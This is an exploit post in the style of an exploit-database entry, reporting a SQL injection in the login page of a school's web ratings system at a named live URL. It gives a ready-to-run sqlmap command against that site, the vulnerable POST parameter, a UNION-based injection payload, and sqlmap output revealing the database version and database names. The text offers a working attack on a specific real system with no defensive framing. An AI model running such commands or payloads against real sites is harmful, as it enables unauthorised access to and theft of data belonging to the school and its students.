# Exploit Title: Santo Domingo School (CSD) / Web Ratings | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "http://csd.atenas.tech/login.html" --form --dbs --batch
---------------------------------------------------------------------------------------------------

Santo Domingo School (CSD)

Web Ratings

http://csd.atenas.tech/login.html

---
Parameter: usuario (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: usuario=rXpi' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qxqxq','mGxiNZtQyMjBiWOgBcfVyIGbwYfYUFiMVrIPuAox'),'qpjxq'),NULL,NULL,NULL-- GxFw&clave=&recuerdame=on
---

the back-end DBMS is MySQL
web application technology: PHP, Apache
the back-end DBMS: MySQL 5 (Percona fork)
banner: '5.6.41-84.1'

available databases [2]:
[+] atenaste_csd
[+] information_schema